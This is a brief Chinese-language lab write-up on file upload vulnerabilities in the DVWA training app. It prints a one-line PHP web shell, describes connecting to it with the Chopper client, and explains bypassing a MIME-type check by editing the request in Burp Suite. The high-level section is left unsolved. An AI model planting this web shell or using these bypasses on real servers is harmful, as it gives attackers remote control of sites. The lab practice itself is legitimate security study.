靶场:DVWA;
工具:kali(burpsuit抓包工具),菜刀
什么是文件上传漏洞
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA实验
等级low
该等级下的网站并未对上传文件的格式做要求,也就是说我们可以上传任何文件包括一句话木马文件shell.php
<?php @eval($_POST['pass']);?>
上传成功后通过url地址验证
使用菜刀连接木马获取web的控制权。
medium
在这一等级,网站设置了简单的筛选条件
if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000))
通过判断文件的属性是否为图片属性,即判断文件的MIME类型
图片的MIME类型为:image/jpeg
这一等级需要我们使用burpsuit抓包更改文件类型
将context.type属性更改为image/jpeg
上传成功后即可使用菜刀进行连接。
high
在该等级下,网站通过限制后缀名以达到防御的目的。
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000))
这一等级奈何自己能力不足还未成功。等成功后回来补充